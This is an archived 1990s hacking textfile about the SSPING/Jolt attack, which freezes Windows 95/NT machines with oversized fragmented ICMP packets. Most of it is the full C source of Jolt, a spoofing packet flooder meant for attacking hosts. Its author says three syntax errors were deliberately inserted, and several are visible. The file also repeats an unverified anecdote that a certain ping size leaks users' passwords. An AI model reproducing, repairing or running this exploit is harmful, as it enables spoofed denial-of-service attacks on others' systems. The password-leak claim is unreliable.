💾 Archived View for gemini.spam.works › mirrors › textfiles › hacking › MICROSOFT › sping2.txt captured on 2022-06-12 at 08:49:02.
-=-=-=-=-=-=-
SSPING/JOLT technical info
Information obtained from
www.darkening.com/ssping
=============================
SSPING was a product of Datagram of Havok, or so it was thought. Jeff W.
Robertson has come forward on BugTraq with his original source code however
which details this.
How it seems to work is it sends the Win95/NT target a series of fragmented IP
packets to machine, and when the machine puts them ogether, it then becomes a
large packet (>64k?), which resembles the classic Ping of Death attack (ICMP
packets > 64K), and then it freezes completely. Hawke also reminded me this isn't
the first time Windows95 or NT has had problems with ICMP.
There were a few things I thought I might mention after reading your bit on microsoft
coding to RFCs and FYIs and in regard to SSPING. These ping problems as you
know have been around for a while ranging from the ping of death to the newer
SSPING but I have not seen mention of another exploit found about a year ago with
ping. And from memory this one sits right in the middle of SSPING and Ping Of
Death. Around the 643?? mark as I said this is from memory but I can look it up for
you or you can read it your self. One of the phrack authors had been playing with ping
slowly working his way up the scale in size and fragmentation when he noticed that
pinging a wintel machine with a packet in size between the other two returned the
victims login name and password. Using a hex editor { I used Xtree Gold } to look at
the debug contents of the returned packet you can in the ASCCI colum as plain as
day actually see the users login name and password. Why ICMP stores that info in
its buffers or indeed if thats where it comes from is beyond me and I have not had
time yet to look into it. But the exploit was originally found to work only on certain
stacks. I set up another machine here and tried numerous stacks including the DUN
that comes with NT/Win95 and plus pack all with success.
The author, Jeff W. Robertson, describes Jolt (the original version of SSPING supposedly) as:
Ok so all this does is build a really fraggmented over sized packet and once win95
gets it, and puts it back together it locks. I send multiple packets by default cause
some times it takes a few packets to totally freeze the host. Maybe its spending
processor time to figure out how to put them back together? I've had reports of people
blue screening from it tho so we'll let Microsoft's boys figure out exactly what this
does to 95. As of now i haven't tested it on NT, but maybe i will later ;). All of this
source wasn't origonally written by me I just took one of the old programs to kill
POSIX and SYSV based systems and worked on it abit, then made it spoof =).
strace output of a normal ping:
sendto(10, "\10\0\2660\7t\2\0\214\26\2663\1\16"..., 64, 0, {sin_family=AF_INET,
sin_port=htons(0), sin_addr=inet_addr("193.14.46.3")}, 16) = 64
strace output of an ssping:
sendto(10, "E\0\0\0zi \1\377\1\347\t\317D\234"..., 63, 0, {sin_family=AF_INET,
sin_port=htons(0), sin_addr=inet_addr("193.14.46.3")}, 16) = 63
I did end up writing an ssping detector for Linux, based on the icmplogger source,
but I wasn't thinking and ran into the problem that ssping has a built in spoofer. I
deleted the source code for my ssping detector after it was telling me that
www.microsoft.com was sspinging it
Source Code
I put the source code online now, for educational purposes. I put a flaw in it's syntax
in three places, which anyone who could learn anything from this program (C
Programmers) should discover easily. This is just so we don't have 30 billion people
using this without reason.
/* Jolt 1.0 (c) 1997 by Jeff w. Roberson
* Please, if you use my code give me credit. Also, if i was the first to
* find this glitch, please give me credit. Thats all i ask.
*
* Ok so all this does is build a really fraggmented over sized packet
* and once win95 gets it, and puts it back together it locks. I send
* multiple packets by default cause some times it takes a few packets to
* totally freeze the host. Maybe its spending processor time to figure
* out how to put them back together? I've had reports of people blue
* screening from it tho so we'll let Microsoft's boys figure out exactly
* what this does to 95. As of now i haven't tested it on NT, but maybe
* I will later ;). All of this source wasn't origonally written by me
* I just took one of the old programs to kill POSIX and SYSV based
* systems and worked on it abit, then made it spoof =).
* VallaH (yaway@hotmail.com)
*
* Update: It apears to work on some older versions of mac os
*/
/* Yah this is for linux, but i like the BSD ip header better then linux's */
#define __BSD_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ipicmp.h>
#include <string.h>
#include <arpa/inet.h>
int main(int argc, char **argv)
{
char buf(400);
struct ip *ip = (struct ip *)buf;
struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
struct hostent *hp, *hp2;
struct sockaddr_in dst;
int offset;
int on = 1;
int num = 5;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW )) < 0) {
perror("socket");
exit(1);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) {
printf("Jolt v1.0 Yet ANOTHER windows95(And macOS!) glitch by VallaH (yaway@hotmail.com)\n");
printf("\nusage: %s <dstaddr> <saddr> [number]\n",argv[0]);
printf("\tdstaddr is the host your attacking\n");
printf("\tsaddr is the host your spoofing from\n");
printf("\tNumber is the number of packets to send, 5 is the default\n");
printf("\nNOTE: This is based on a bug that used to affect POSIX complient, and SYSV \n\t systems so its
nothing new..\n");
printf("\nGreets to Bill Gates! How do ya like this one? :-)\n");
exit(1);
}
if (argc == 4) num = atoi(argv[3]);
for (i=1;i<=num;i++) {
if ((hp = gethostbyname(argv[1])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
exit(1);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length;
}
if ((hp2 = gethostbyname(argv[2])) == NULL) {
if ((ip->ip_src.s_addr = inet_addr(argv[2])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[2]);
exit(1);
}
} else {
bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = htons(sizeof buf);
ip->ip_id = htons(4321);
ip->ip_off = htons(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_csum = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = htons(~(ICMP_ECHO << 8));
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = htons(offset >> 3);
if (offset < 65120)
ip->ip_off |= htons(0x2000);
else
ip->ip_len = htons(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->type = 0;
icmp->code = 0;
icmp->checksum = 0;
}
}
}
return 0;
}